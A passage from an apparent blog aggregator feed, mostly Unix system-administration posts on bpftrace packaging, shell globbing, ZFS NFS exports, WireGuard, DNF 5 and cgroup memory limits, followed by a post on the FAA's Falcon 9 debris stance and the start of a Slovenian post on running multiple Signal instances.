As far as I can see, there are two things that could have happened here. The first is that Canonical simply built a 24.10 (or later) bpftrace binary .deb and put it in 24.04 without bothering to check if the result actually worked. I would like to say that this shows shocking disregard for the functioning of an increasingly important observability tool from Canonical, but actually it's not shocking at all, it's Canonical being Canonical (and they would like us to pay for this for some reason). The second and worse option is that Canonical is building 'Ubuntu 24.04' packages in an environment that is contaminated with 24.10 or later packages, shared libraries, and so on. This isn't supposed to happen in a properly operating package building environment that intends to create reliable and reproducible results and casts doubt on the provenance and reliability of all Ubuntu 24.04 packages.

(I don't know if there's a way to inspect binary .debs to determine anything about the environment they were built in, the way you can get some information about RPMs. Also, I now have a new appreciation for Fedora putting the Fedora release version into the actual RPM's 'release' name. Ubuntu 24.10 and 24.04 don't have the same version of bpftrace, so this isn't quite as simple as Canonical copying the 24.10 package to 24.04; 24.10 has 0.21.2, while 24.04 is theoretically 0.20.2.)

Incidentally, this isn't an issue of the shared library having its name changed, because if you manually create a 'libLLVM-18.so.18.1' symbolic link to the 24.04 libllvm18's 'libLLVM.so.18.1' and run bpftrace, what you get is:

$ bpftrace
: CommandLine Error: Option 'debug-counter' registered more than once!
LLVM ERROR: inconsistency in registered CommandLine options
abort

This appears to say that the Ubuntu 24.04 bpftrace binary is incompatible with the Ubuntu 24.04 libllvm18 shared libraries. I suspect that it was built against different LLVM 18 headers as well as different LLVM 18 shared libraries.

How to accidentally get yourself with 'find ... -name something*'

By: cks

Suppose that you're in some subdirectory /a/b/c, and you want to search all of /a for the presence of files for any version of some program:

u@h:/a/b/c$ find /a -name program* -print

This reports '/a/b/c/program-1.2.tar' and '/a/b/f/program-1.2.tar', but you happen to know that there are other versions of the program under /a. What happened to a command that normally works fine?

As you may have already spotted, what happened is the shell's wildcard expansion. Because you ran your find in a directory that contained exactly one match for 'program*', the shell expanded it before you ran find, and what you actually ran was:

find /a -name program-1.2.tar -print

This reported the two instances of program-1.2.tar in the /a tree, but not the program-1.4.1.tar that was also in the /a tree.

If you'd run your find command in a directory without a shell match for the -name wildcard, the shell would (normally) pass the unexpanded wildcard through to find, which would do what you want. And if there had been only one instance of 'program-1.2.tar' in the tree, in your current directory, it might have been more obvious what went wrong; instead, the find returning more than one result made it look like it was working normally apart from inexplicably not finding and reporting 'program-1.4.1.tar'.

(If there were multiple matches for the wildcard in the current directory, 'find' would probably have complained and you'd have realized what was going on.)

Some shells have options to cause failed wildcard expansions to be considered an error; Bash has the 'failglob' shopt, for example. People who turn these options on are probably not going to stumble into this because they've already been conditioned to quote wildcards for 'find -name' and other similar tools. Possibly this Bash option or its equivalent in other shells should be the default for new Unix accounts, just so everyone gets used to quoting wildcards that are supposed to be passed through to programs.

(Although I don't use a shell that makes failed wildcard expansions an error, I somehow long ago internalized the idea that I should quote all wildcards I want to pass to programs.)

The (potential) complexity of good runqueue latency measurement in Linux

By: cks

Run queue latency is the time between when a Linux task becomes ready to run and when it actually runs. If you want good responsiveness, you want a low runqueue latency, so for a while I've been tracking a histogram of it with eBPF, and I put some graphs of it up on some Grafana dashboards I look at. Then recently I improved the responsiveness of my desktop with the cgroup V2 'cpu.idle' setting, and questions came up about how this different from process niceness. When I was looking at those questions, I realized that my run queue latency measurements were incomplete.

When I first set up my run queue latency tracking, I wasn't using either cgroup V2 cpu.idle or process niceness, and so I set up a single global runqueue latency histogram for all tasks regardless of their priority and scheduling class. Once I started using 'idle' CPU scheduling (and testing the effectiveness of niceness), this resulted in hopelessly muddled data that was effectively meaningless during the time that multiple scheduling types of scheduling or multiple nicenesses were running. Running CPU-consuming processes only when the system is otherwise idle is (hopefully) good for the runqueue latency of my regular desktop processes, but more terrible than usual for those 'run only when idle' processes, and generally there's going to be a lot more of them than my desktop processes.

The moment you introduce more than one 'class' of processes for scheduling, you need to split run queue latency measurements up between these classes if you want to really make sense of the results. What these classes are will depend on your environment. I could probably get away with a class for 'cpu.idle' tasks, a class for heavily nice'd tasks, a class for regular tasks, and perhaps a class for (system) processes running with very high priority. If you're doing fair share scheduling between logins, you might need a class per login (or you could ignore run queue latency as too noisy a measure).

I'm not sure I'd actually track all of my classes as Prometheus metrics. For my personal purposes, I don't care very much about the run queue latency of 'idle' or heavily nice'd processes, so perhaps I should update my personal metrics gathering to just ignore those. Alternately, I could write a bpftrace script that gathered the detailed class by class data, run it by hand when I was curious, and ignore the issue otherwise (continuing with my 'global' run queue latency histogram, which is at least honest in general).

The history and use of /etc/glob in early Unixes

By: cks

One of the innovations that the V7 Bourne shell introduced was built in shell wildcard globbing, which is to say expanding things like *, ?, and so on. Of course Unix had shell wildcards well before V7, but in V6 and earlier, the shell didn't implement globbing itself; instead this was delegated to an external program, /etc/glob (this affects things like looking into the history of Unix shell wildcards, because you have to know to look at the glob source, not the shell).

As covered in places like the V6 glob(8) manual page, the glob program was passed a command and its arguments (already split up by the shell), and went through the arguments to expand any wildcards it found, then exec()'d the command with the now expanded arguments. The shell operated by scanning all of the arguments for (unescaped) wildcard characters. If any were found, the shell exec'd /etc/glob with the whole show; otherwise, it directly exec()'d the command with its arguments. Quoting wildcards used a hack that will be discussed later.

This basic /etc/glob behavior goes all the way back to Unix V1, where we have sh.s and in it we can see that invocation of /etc/glob. In V2, glob is one of the programs that have been rewritten in C (glob.c), and in V3 we have a sh.1 that mentions /etc/glob and has an interesting BUGS note about it:

If any argument contains a quoted "*", "?", or "[", then all instances of these characters must be quoted. This is because sh calls the glob routine whenever an unquoted "*", "?", or "[" is noticed; the fact that other instances of these characters occurred quoted is not noticed by glob.

This section has disappeared in the V4 sh.1 manual page, which suggests that the V4 shell and /etc/glob had acquired the hack they use in V5 and V6 to avoid this particular problem.

How escaping wildcards works in the V5 and V6 shell is that all characters in commands and arguments are restricted to being seven-bit ASCII. The shell and /etc/glob both use the 8th bit to mark quoted characters, which means that such quoted characters don't match their unquoted versions and won't be seen as wildcards by either the shell (when it's deciding whether or not it needs to run /etc/glob) or by /etc/glob itself (when it's deciding what to expand). However, obviously neither the shell nor /etc/glob can pass such 'marked as quoted' characters to actual commands, so each of them strips the high bit from all characters before exec()'ing actual commands.

(This is clearer in the V5 glob.c source; look for how cat() ands every character with octal 0177 (0x7f) to drop the high bit. You can also see it in the V5 sh.c source, where you want to look at trim(), and also the #define for 'quote' at the start of sh.c and how it's used later.)

PS: I don't know why expanding shell wildcards used a separate program in V6 and earlier, but part of it may have been to keep the shell smaller and more minimal so that it required less memory.

PPS: See also Stephen R. Bourne's 2015 presentation from BSDCan [PDF], which has a bunch of interesting things on the V7 shell and confirms that /etc/glob was there from V1.

What a FreeBSD kernel message about your bridge means

By: cks

Suppose, not hypothetically, that you're operating a FreeBSD based bridging firewall (or some other bridge situation) and you see something like the following kernel message:

kernel: bridge0: mac address 01:02:03:04:05:06 vlan 0 moved from ix0 to ix1
kernel: bridge0: mac address 01:02:03:04:05:06 vlan 0 moved from ix1 to ix0

The bad news is that this message means what you think it means. Your FreeBSD bridge between ix0 and ix1 first saw this MAC address as the source address on a packet it received on the ix0 interface of the bridge, and then it saw the same MAC address as the source address of a packet received on ix1, and then it received another packet on ix0 with that MAC address as the source address. Either you have something echoing those packets back on one side, or there is a network path between the two sides that bypasses your bridge.

(If you're lucky this happens regularly. If you're not lucky it happens only some of the time.)

This particular message comes from bridge_rtupdate() in sys/net/if_bridge.c, which is called to update the bridge's 'routing entries', which here means MAC addresses, not IP addresses. This function is called from bridge_forward(), which forwards packets, which is itself called from bridge_input(), which handles received packets. All of this only happens if the underlying interfaces are in 'learning' mode, but this is the default.

As covered in the ifconfig manual page, you can inspect what MAC addresses have been learned on which device with 'ifconfig bridge0 addr' (covered in the 'Bridge Interface Parameters' section of the manual page). This may be useful to see if your bridge normally has a certain MAC address (perhaps the one that's moving) on the interface it should be on. If you want to go further, it's possible to set a static mapping for some MAC addresses, which will make them stick to one interface even if seen on another one.

Logging this message is controlled by the net.link.bridge.log_mac_flap sysctl, and it's rate limited to only being reported five times a second in general (using ppsratecheck()). That's five times total, even if each time is a different MAC address or even a different bridge. This 'five times a second' log count isn't controllable through a sysctl.

(I'm writing all of this down because I looked much of it up today. Sometimes I'm a system programmer who goes digging in the (FreeBSD) kernel source just to be sure.)

The issue with DNF 5 and script output in Fedora 41

By: cks

These days Fedora uses DNF as its high(er) level package management software, replacing yum. However, there are multiple versions of DNF, which behave somewhat differently. Through Fedora 40, the default version of DNF was DNF 4; in Fedora 41, DNF is now DNF 5. DNF 5 brings a number of improvements but it has at least one issue that makes me unhappy with it in my specific situation. Over on the Fediverse I said:

Oh nice, DNF 5 in Fedora 41 has nicely improved the handling of output from RPM scriptlets, so that you can more easily see that it's scriptlet output instead of DNF messages.

[later]

I must retract my praise for DNF 5 in Fedora 41, because it has actually made the handling of output from RPM scriptlets *much* worse than in dnf 4. DNF 5 will repeatedly re-print the current output to date of scriptlets every time it updates a progress indicator of, for example, removing packages. This results in a flood of output for DKMS module builds during kernel updates. Dnf 5's cure is far worse than the disease, and there's no way to disable it.

<bugzilla 2331691>

(Fedora 41 specifically has dnf5-5.2.8.1, at least at the moment.)

This can be mostly worked around for kernel package upgrades and DKMS modules by manually removing and upgrading packages before the main kernel upgrade. You want to do this so that dnf is removing as few packages as possible while your DKMS modules are rebuilding. This is done with:

  1. Upgrade all of your non-kernel packages first:

    dnf upgrade --exclude 'kernel*'
    

  2. Remove the following packages for the old kernel:

    kernel kernel-core kernel-devel kernel-modules kernel-modules-core kernel-modules-extra

    (It's probably easier to do 'dnf remove kernel*<version>*' and let DNF sort it out.)

  3. Upgrade two kernel packages that you can do in advance:

    dnf upgrade kernel-tools kernel-tools-libs
    

Unfortunately in Fedora 41 this still leaves you with one RPM package that you can't upgrade in advance and that will be removed while your DKMS module is rebuilding, namely 'kernel-devel-matched'. To add extra annoyance, this is a virtual package that contains no files, and you can't remove it because a lot of things depend on it.

As far as I can tell, DNF 5 has absolutely no way to shut off its progress bars. It completely ignores $TERM and I can't see anything else that leaves DNF usable. It would have been nice to have some command line switches to control this, but it seems pretty clear that this wasn't high on the DNF 5 road map.

(Although I don't expect this to be fixed in Fedora 41 over its lifetime, I am still deferring the Fedora 41 upgrades of my work and home desktops for as long as possible to minimize the amount of DNF 5 irritation I have to deal with.)

WireGuard's AllowedIPs aren't always the (WireGuard) routes you want

By: cks

A while back I wrote about understanding WireGuard's AllowedIPs, and also recently I wrote about how different sorts of WireGuard setups have different difficulties, where one of the challenges for some setups is setting up what you want routed through WireGuard connections. As Ian Z aka nobrowser recently noted in a comment on the first entry, these days many WireGuard related programs (such as wg-quick and NetworkManager) will automatically set routes for you based on AllowedIPs. Much of the time this will work fine, but there are situations where adding routes for all AllowedIPs ranges isn't what you want.

WireGuard's AllowedIPs setting for a particular peer controls two things at once: what (inside-WireGuard) source IP addresses you will accept from the peer, and what destination addresses WireGuard will send to that peer if the packet is sent to that WireGuard interface. However, it's the routing table that controls what destination addresses are sent to a particular WireGuard interface (or more likely a combination of IP policy routing rules and some routing table).

If your WireGuard IP address is only reachable from other WireGuard peers, you can sensibly bound your AllowedIPs so that the collection of all of them matches the routing table. This is also more or less doable if some of them are gateways for additional networks; hopefully your network design puts all of those networks under some subnet and the subnet isn't too big. However, if your WireGuard IP can wind up being reached by a broader range of source IPs, or even 'all of the Internet' (as is my case), then your AllowedIPs range is potentially much larger than what you want to always be routed to WireGuard.

A related case is if you have a 'work VPN' WireGuard configuration where you could route all of your traffic through your WireGuard connection but some of the time you only want to route traffic to specific (work) subnets. Unless you like changing AllowedIPs all of the time or constructing two different WireGuard interfaces and only activating the correct one, you'll want an AllowedIPs that accepts everything but some of the time you'll only route specific networks to the WireGuard interface.

(On the other hand, with the state of things in Linux, having two separate WireGuard interfaces might be the easiest way to manage this in NetworkManager or other tools.)

I think that most people's use of WireGuard will probably involve AllowedIPs settings that also work for routing, provided that the tools involve handle the recursive routing problem. These days, NetworkManager handles that for you, although I don't know about wg-quick.

(This is one of the entries that I write partly to work it out in my own head. My own configuration requires a different AllowedIPs than the routes I send through the WireGuard tunnel. I make this work with policy based routing.)

My unusual X desktop wasn't made 'from scratch' in a conventional sense

By: cks

There are people out there who set up unusual (Unix) environments for themselves from scratch; for example, Mike Hoye recently wrote Idiosyncra. While I have an unusual desktop, I haven't built it from scratch in quite the same way that Mike Hoye and other people have; instead I've wound up with my desktop through a rather easier process.

It would be technically accurate to say that my current desktop environment has been built up gradually over time (including over the time I've been writing Wandering Thoughts, such as my addition of dmenu). But this isn't really how it happened, in that I didn't start from a normal desktop and slowly change it into my current one. The real story is that the core of my desktop dates from the days when everyone's X desktops looked like mine does. Technically there were what we would call full desktops back in those days, if you had licensed the necessary software from your Unix vendor and chose to run it, but hardware was sufficiently slow back then that people at universities almost always chose to run more lightweight environments (especially since they were often already using the inexpensive and slow versions of workstations).

(Depending on how much work your local university system administrators had done, your new Unix account might start out with the Unix vendor's X setup, or it could start out with what X11R<whatever> defaulted to when built from source, or it might be some locally customized setup. In all cases you often were left to learn about the local tastes in X desktops and how to improve yours from people around you.)

To show how far back this goes (which is to say how little of it has been built 'from scratch' recently), my 1996 SGI Indy desktop has much of the look and the behavior of my current desktop, and its look and behavior wasn't new then; it was an evolution of my desktop from earlier Unix workstations. When I started using Linux, I migrated my Indy X environment to my new (and better) x86 hardware, and then as Linux has evolved and added more and more things you have to run to have a usable desktop with things like volume control, your SSH agent, and automatically mounted removable media, I've added them piece by piece (and sometimes updated them as how you do this keeps changing).

(At some point I moved from twm as my window manager to fvwm, but that was merely redoing my twm configuration in fvwm, not designing a new configuration from scratch.)

I wouldn't want to start from scratch today to create a new custom desktop environment; it would be a lot of work (and the one time I looked at it I wound up giving up). Someday I will have to move from X, fvwm, dmenu, and so on to some sort of Wayland based environment, but even when I do I expect to make the result as similar to my current X setup as I can, rather than starting from a clean sheet design. I know what I want because I'm very used to my current environment and I've been using variants of it for a very long time now.

(This entry was sparked by Ian Z aka nobrowser's comment on my entry from yesterday.)

PS: Part of the long lineage and longevity of my X desktop is that I've been lucky and determined enough to use Unix and X continuously at work, and for a long time at home as well. So I've never had a time when I moved away from X on my desktop(s) and then had to come back to reconstruct an environment and catch it up to date.

PPS: This is one of the roots of my xdm heresy, where my desktops boot into a text console and I log in there to manually start X with a personal script that's a derivative of the ancient startx command.

In an unconfigured Vim, I want to do ':set paste' right away

By: cks

Recently I wound up using a FreeBSD machine, where I promptly installed vim for my traditional reason. When I started modifying some files, I had contents to paste in from another xterm window, so I tapped my middle mouse button while in insert mode (ie, I did the standard xterm 'paste text' thing). You may imagine the 'this is my face' meme when what vim inserted was the last thing I'd deleted in vim on that FreeBSD machine, instead of my X text selection.

For my future use, the cure for this is ':set paste', which turns off basically all of vim's special handling of pasted text. I've traditionally used this to override things like vim auto-indenting or auto-commenting the text I'm pasting in, but it also turns off vim's special mouse handling, which is generally active in terminal windows, including over SSH.

(The defaults for ':set mouse' seem to vary from system to system and probably vim build to vim build. For whatever reason, this FreeBSD system and its vim defaulted to 'mouse=a', ie special mouse handling was active all the time. I've run into mouse handling limits in vim before, although things may have changed since then.)

In theory, as covered in Vim's X11 selection mechanism, I might be able to paste from another xterm (or whatever) using "*p (to use the '"*' register, which is the primary selection or the cut buffer if there's no primary selection). In practice I think this only works under limited circumstances (although I'm not sure what they are) and the Vim manual itself tells you to get used to using Shift with your middle mouse button. I would rather set paste mode, because that gets everything; a vim that has the mouse active probably has other things I don't want turned on too.

(Some day I'll put together a complete but minimal collection of vim settings to disable everything I want disabled, but that day isn't today.)

PS: If I'm reading various things correctly, I think vim has to be built with the 'xterm_clipboard' option in order to pull out selection information from xterm. Xterm itself must have 'Window Ops' allowed, which is not a normal setting; with this turned on, vim (or any other program) can use the selection manipulation escape sequences that xterm documents in "Operating System Commands". These escape sequences don't require that vim have direct access to your X display, so they can be used over plain SSH connections. Support for these escape sequences is probably available in other terminal emulators too, and these terminal emulators may have them always enabled.

(Note that access to your selection is a potential security risk, which is probably part of why xterm doesn't allow it by default.)

Cgroup V2 memory limits and their potential for thrashing

By: cks

Recently I read 32 MiB Working Sets on a 64 GiB machine (via), which recounts how under some situations, Windows could limit the working set ('resident set') of programs to 32 MiB, resulting in a lot of CPU time being spent on soft (or 'minor') page faults. On Linux, you can do similar things to limit memory usage of a program or an entire cgroup, for example through systemd, and it occurred to me to wonder if you can get the same thrashing effect with cgroup V2 memory limits. Broadly, I believe that the answer depends on what you're using the memory for and what you use to set limits, and it's certainly possible to wind up setting limits so that you get thrashing.

(As a result, this is now something that I'll want to think about when setting cgroup memory limits, and maybe watch out for.)

Cgroup V2 doesn't have anything that directly limits a cgroup's working set (what is usually called the 'resident set size' (RSS) on Unix systems). The closest it has is memory.high, which throttles a cgroup's memory usage and puts it under heavy memory reclaim pressure when it hits this high limit. What happens next depends on what sort of memory pages are being reclaimed from the process. If they are backed by files (for example, they're pages from the program, shared libraries, or memory mapped files), they will be dropped from the process's resident set but may stay in memory so it's only a soft page fault when they're next accessed. However, if they're anonymous pages of memory the process has allocated, they must be written to swap (if there's room for them) and I don't know if the original pages stay in memory afterward (and so are eligible for a soft page fault when next accessed). If the process keeps accessing anonymous pages that were previously reclaimed, it will thrash on either soft or hard page faults.

(The memory.high limit is set by systemd's MemoryHigh=.)

However, the memory usage of a cgroup is not necessarily in ordinary process memory that counts for RSS; it can be in all sorts of kernel caches and structures. The memory.high limit affects all of them and will generally shrink all of them, so in practice what it actually limits depends partly on what the processes in the cgroup are doing and what sort of memory that allocates. Some of this memory can also thrash like user memory does (for example, memory for disk cache), but some won't necessarily (I believe shrinking some sorts of memory usage discards the memory outright).

Since memory.high is to a certain degree advisory and doesn't guarantee that the cgroup never goes over this memory usage, I think people more commonly use memory.max (for example, via the systemd MemoryMax= setting). This is a hard limit and will kill programs in the cgroup if they push hard on going over it; however, the memory system will try to reduce usage with other measures, including pushing pages into swap space. In theory this could result in either swap thrashing or soft page fault thrashing, if the memory usage was just right. However, in our environments cgroups that hit memory.max generally wind up having programs killed rather than sitting there thrashing (at least for very long). This is probably partly because we don't configure much swap space on our servers, so there's not much room between hitting memory.max with swap available and exhausting the swap space too.

My view is that this generally makes it better to set memory.max than memory.high. If you have a cgroup that overruns whatever limit you're setting, using memory.high is much more likely to cause some sort of thrashing because it never kills processes (the kernel documentation even tells you that memory.high should be used with some sort of monitoring to 'alleviate heavy reclaim pressure', ie either raise the limit or actually kill things). In a past entry I set MemoryHigh= to a bit less than my MemoryMax setting, but I don't think I'll do that in the future; any gap between memory.high and memory.max is an opportunity for thrashing through that 'heavy reclaim pressure'.

WireGuard on OpenBSD just works (at least as a VPN server)

By: cks

A year or so ago I mentioned that I'd set up WireGuard on an Android and an iOS device in a straightforward VPN configuration. What I didn't mention in that entry is that the other end of the VPN was not on a Linux machine, but on one of our OpenBSD VPN servers. At the time it was running whatever was the then-current OpenBSD version, and today it's running OpenBSD 7.6, which is the current version at the moment. Over that time (and before it, since the smartphones weren't its first WireGuard clients), WireGuard on OpenBSD has been trouble free and has just worked.

In our configuration, OpenBSD WireGuard requires installing the 'wireguard-tools' package, setting up an /etc/wireguard/wg0.conf (perhaps plus additional files for generated keys), and creating an appropriate /etc/hostname.wg0. I believe that all of these are covered as part of the standard OpenBSD documentation for setting up WireGuard. For this VPN server I allocated a /24 inside the RFC 1918 range we use for VPN service to be used for WireGuard, since I don't expect too many clients on this server. The server NATs WireGuard connections just as it NATs connections from the other VPNs it supports, which requires nothing special for WireGuard in its /etc/pf.conf.

(I did have to remember to allow incoming traffic to the WireGuard UDP port. For this server, we allow WireGuard clients to send traffic to each other through the VPN server if they really want to, but in another one we might want to restrict that with additional pf rules.)

Everything I'd expect to work does work, both in terms of the WireGuard tools (I believe the information 'wg' prints is identical between Linux and OpenBSD, for example) and for basic system metrics (as read out by, for example, the OpenBSD version of the Prometheus host agent, which has overall metrics for the 'wg0' interface). If we wanted per-client statistics, I believe we could probably get them through this third party WireGuard Prometheus exporter, which uses an underlying package to talk to WireGuard that does apparently work on OpenBSD (although this particular exporter can potentially have label cardinality issues), or generate them ourselves by parsing 'wg' output (likely from 'wg show all dump').

This particular OpenBSD VPN server is sufficiently low usage that I haven't tried to measure either the possible bandwidth we can achieve with WireGuard or the CPU usage of WireGuard. Historically, neither are particularly critical for our VPNs in general, which have generally not been capable of particularly high bandwidth (with either OpenVPN or L2TP, our two general usage VPN types so far; our WireGuard VPN is for system staff only).

(In an ideal world, none of this should count as surprising. In this world, I like to note when things that are a bit out of the mainstream just work for me, with a straightforward setup process and trouble free operation.)

A gotcha with importing ZFS pools and NFS exports on Linux (as of ZFS 2.3.0)

By: cks

Ever since its Solaris origins, ZFS has supported automatic NFS and CIFS sharing of ZFS filesystems through their 'sharenfs' and 'sharesmb' properties. Part of the idea of this is that you could automatically have NFS (and SMB) shares created and removed as you did things like import and export pools, rather than have to maintain a separate set of export information and keep it in sync with what ZFS filesystems were available. On Linux, OpenZFS still supports this, working through standard Linux NFS export permissions (which don't quite match the Solaris/Illumos model that's used for sharenfs) and standard tools like exportfs. A lot of this works more or less as you'd expect, but it turns out that there's a potentially unpleasant surprise lurking in how 'zpool import' and 'zpool export' work.

In the current code, if you import or export a ZFS pool that has no filesystems with a sharenfs set, ZFS will still run 'exportfs -ra' at the end of the operation even though nothing could have changed in the NFS exports situation. An important effect that this has is that it will wipe out any manually added or changed NFS exports, reverting your NFS exports to what is currently in /etc/exports and /etc/exports.d. In many situations (including ours) this is a harmless operation, because /etc/exports and /etc/exports.d are how things are supposed to be. But in some environments you may have programs that maintain their own exports list and permissions through running 'exportfs' in various ways, and in these environments a ZFS pool import or export will destroy those exports.

(Apparently one such environment is high availability systems, some of which manually manage NFS exports outside of /etc/exports (I maintain that this is a perfectly sensible design decision). These are also the kind of environment that might routinely import or export pools, as HA pools move between hosts.)

The current OpenZFS code runs 'exportfs -ra' entirely blindly. It doesn't matter if you don't NFS export any ZFS filesystems, much less any from the pool that you're importing or exporting. As long as an 'exportfs' binary is on the system and can be executed, ZFS will run it. Possibly this could be changed if someone was to submit an OpenZFS bug report, but for a number of reasons (including that we're not directly affected by this and aren't in a position to do any testing), that someone will not be me.

(As far as I can tell this is the state of the code in all Linux OpenZFS versions up through the current development version and 2.3.0-rc4, the latest 2.3.0 release candidate.)

Appendix: Where this is in the current OpenZFS source code

The exportfs execution is done in nfs_commit_shares() in lib/libshare/os/linux/nfs.c. This is called (indirectly) by sa_commit_shares() in lib/libshare/libshare.c, which is called by zfs_commit_shares() in lib/libzfs/libzfs_mount.c. In turn this is called by zpool_enable_datasets() and zpool_disable_datasets(), also in libzfs_mount.c, which are called as part of 'zpool import' and 'zpool export' respectively.

(As a piece of trivia, zpool_disable_datasets() will also be called during 'zpool destroy'.)

On the US FAA's response to Falcon 9 debris

By: VM
On the US FAA's response to Falcon 9 debris

On February 1, SpaceX launched its Starlink 11-4 mission onboard a Falcon 9 rocket. The rocket's reusable first stage returned safely to the ground and the second stage remained in orbit after deploying the Starlink satellites. It was to deorbit later in a controlled procedure and land somewhere in the Pacific Ocean. But on February 19 it was seen breaking up in the skies over Denmark, England, Poland, and Sweden, with some larger pieces crashing into parts of Poland. After the Polish space agency determined the debris to belong to a SpaceX Falcon 9 rocket, the US Federal Aviation Administration (FAA) was asked about its liability. This was its response:

The FAA determined that all flight events for the SpaceX Starlink 11-4 mission occurred within the scope of SpaceX's licensed activities and that SpaceX satisfied safety at end-of-launch requirements. Per post-launch reporting requirements, SpaceX must identify any discrepancy or anomaly that occurred during the launch to the FAA within 90-days. The FAA has not identified any events that should be classified as a mishap at this time. Licensed flight activities and FAA oversight concluded upon SpaceX's last exercise of control over the Falcon 9 vehicle. SpaceX posted information on its website that the second stage from this launch reentered over Europe. The FAA is not investigating the uncontrolled reentry of the second stage nor the debris found in Poland.

I've spotted a lot of people on the internet (not trolls) describing this response as being in line with Donald Trump's "USA first" attitude and reckless disregard for the consequences of his government's actions and policies on other countries. It's understandable given how his meeting with Zelenskyy on February 28 played out as well as NASA acting administrator Janet Petro's disgusting comment about US plans to "dominate" lunar and cislunar space. However, the FAA's position has been unchanged since at least August 18, 2023, when it issued a "notice of proposed rulemaking" designated 88 FR 56546. Among other things:

The proposed rule would … update definitions relating to commercial space launch and reentry vehicles and occupants to reflect current legislative definitions … as well as implement clarifications to financial responsibility requirements in accordance with the United States Commercial Space Launch Competitiveness Act.

Under Section 401.5 2(i), the notice stated:

(1) Beginning of launch. (i) Under a license, launch begins with the arrival of a launch vehicle or payload at a U.S. launch site.

The FAA's position has likely stayed the same for some duration before the August 2023 date. According to Table 1 in the notice, the "effect of change" of the clarification of the term "Launch", under which Section 401.5 2(i) falls, is:

None. The FAA has been applying these definitions in accordance with the statute since the [US Commercial Space Launch Competitiveness Act 2015] went into effect. This change would now provide regulatory clarity.

Skipping back a bit further, the FAA issued a "final rule" on "Streamlined Launch and Reentry License Requirements" on September 30, 2020. The rule states (pp. 680-681) under Section 450.1 (b) 3:

(i) For an orbital launch of a vehicle without a reentry of the vehicle, launch ends after the licensee’s last exercise of control over its vehicle on orbit, after vehicle component impact or landing on Earth, after activities necessary to return the vehicle or component to a safe condition on the ground after impact or landing, or after activities necessary to return the site to a safe condition, whichever occurs latest;
(ii) For an orbital launch of a vehicle with a reentry of the vehicle, launch ends after deployment of all payloads, upon completion of the vehicle's first steady-state orbit if there is no payload deployment, after vehicle component impact or landing on Earth, after activities necessary to return the vehicle or component to a safe condition on the ground after impact or landing, or after activities necessary to return the site to a safe condition, whichever occurs latest; …

In part B of this document, under the heading "Detailed Discussion of the Final Rule" and further under the sub-heading "End of Launch", the FAA presents the following discussion:

[Commercial Spaceflight Federation] and SpaceX suggested that orbital launch without a reentry in proposed §450.3(b)(3)(i) did not need to be separately defined by the regulation, stating that, regardless of the type of launch, something always returns: Boosters land or are disposed, upper stages are disposed. CSF and SpaceX further requested that the FAA not distinguish between orbital and suborbital vehicles for end of launch.
The FAA does not agree because the distinctions in § 450.3(b)(3)(i) and (ii) are necessary due to the FAA's limited authority on orbit. For a launch vehicle that will eventually return to Earth as a reentry vehicle, its on-orbit activities after deployment of its payload or payloads, or completion of the vehicle's first steady-state orbit if there is no payload, are not licensed by the FAA. In addition, the disposal of an upper stage is not a reentry under 51 U.S.C. Chapter 509, because the upper stage does not return to Earth substantially intact.

From 51 USC Chapter 509, Section 401.7:

Reentry vehicle means a vehicle designed to return from Earth orbit or outer space to Earth substantially intact. A reusable launch vehicle that is designed to return from Earth orbit or outer space to Earth substantially intact is a reentry vehicle.

This means Section 450.1 (b) 3(i) under "Streamlined Launch and Reentry License Requirements" of 2020 applies to the uncontrolled deorbiting of the Falcon 9 upper stage in the Starlink 11-4 mission. In particular, according to the FAA, the launch ended "after the licensee’s last exercise of control over its vehicle on orbit", which was the latest relevant event.

Back to the "Detailed Discussion of the Final Rule":

Both CSF and SpaceX proposed “end of launch” should be defined on a case-by-case basis in pre-application consultation and specified in the license. The FAA disagrees, in part. The FAA only regulates on a case-by-case basis if the nature of an activity makes it impossible for the FAA to promulgate rules of general applicability. This need has not arisen, as evidenced by decades of FAA oversight of end-of-launch activities. That said, because the commercial space transportation industry continues to innovate, §450.3(a) gives the FAA the flexibility to adjust the scope of license, including end of launch, based on unique circumstances as agreed to by the Administrator.

The world currently doesn't have a specific international law or agreement dealing with accountability for space debris that crashes to the earth, including paying for the damages such debris wreaks and imposing penalties on offending launch operators. In light of this fact, it's important to remember the FAA's position — even if it seems disagreeable — has been unchanged for some time even as it has regularly updated its rulemaking to accommodate private sector innovation within the spirit of the existing law.

Trump is an ass and I'm not holding out for him to look out for the concerns of other countries when pieces of made-in-USA rockets descend in uncontrolled fashion over their territories, damaging property or even taking lives. But that the FAA didn't develop its present position afresh under Trump 2.0, and that it was really developed with feedback from SpaceX and other US-based spaceflight operators, is important to understand that its attitude towards crashing debris goes beyond ideology, encompassing the support of both Democrat and Republican governments over the years.

Signal kontejner

Signal je aplikacija za varno in zasebno sporočanje, ki je brezplačna, odprtokodna in enostavna za uporabo. Uporablja močno šifriranje od začetne do končne točke (anlg. end-to-end), uporabljajo pa jo številni aktivisti, novinarji, žvižgači, pa tudi državni uradniki in poslovneži. Skratka vsi, ki cenijo svojo zasebnost. Signal teče na mobilnih telefonih z operacijskim sistemom Android in iOS, pa tudi na namiznih računalnikih (Linux, Windows, MacOS) - pri čemer je namizna različica narejena tako, da jo povežemo s svojo mobilno različico Signala. To nam omogoča, da lahko vse funkcije Signala uporabljamo tako na telefonu kot na namiznem računalniku, prav tako se vsa sporočila, kontakti, itd. sinhronizirajo med obema napravama. Vse lepo in prav, a Signal je (žal) vezan na telefonsko številko in praviloma lahko na enem telefonu poganjate samo eno kopijo Signala, enako pa velja tudi za namizni računalnik. Bi se dalo to omejitev zaobiti? Vsekakor, a za to je potreben manjši “hack”. Kakšen, preberite v nadaljevanju.

Poganjanje več različic Signala na telefonu

Poganjanje več različic Signala na telefonu je zelo enostavno - a samo, če uporabljate GrapheneOS. GrapheneOS je operacijski sistem za mobilne telefone, ki ima vgrajene številne varnostne mehanizme, poleg tega pa je zasnovan na način, da kar najbolje skrbi za zasebnost uporabnika. Je odprtokoden, visoko kompatibilen z Androidom, vendar s številnimi izboljšavami, ki izredno otežujejo oz. kar onemogočajo tako forenzični zaseg podatkov, kot tudi napade z vohunsko programsko opremo tipa Pegasus in Predator.

GrapheneOS omogoča uporabo več profilov (do 31 + uporabniški profil tim. gosta), ki so med seboj popolnoma ločeni. To pomeni, da lahko v različnih profilih nameščate različne aplikacije, imate povsem različen seznam stikov, na enem profilu uporabljate en VPN, na drugem drugega ali pa sploh nobenega, itd.

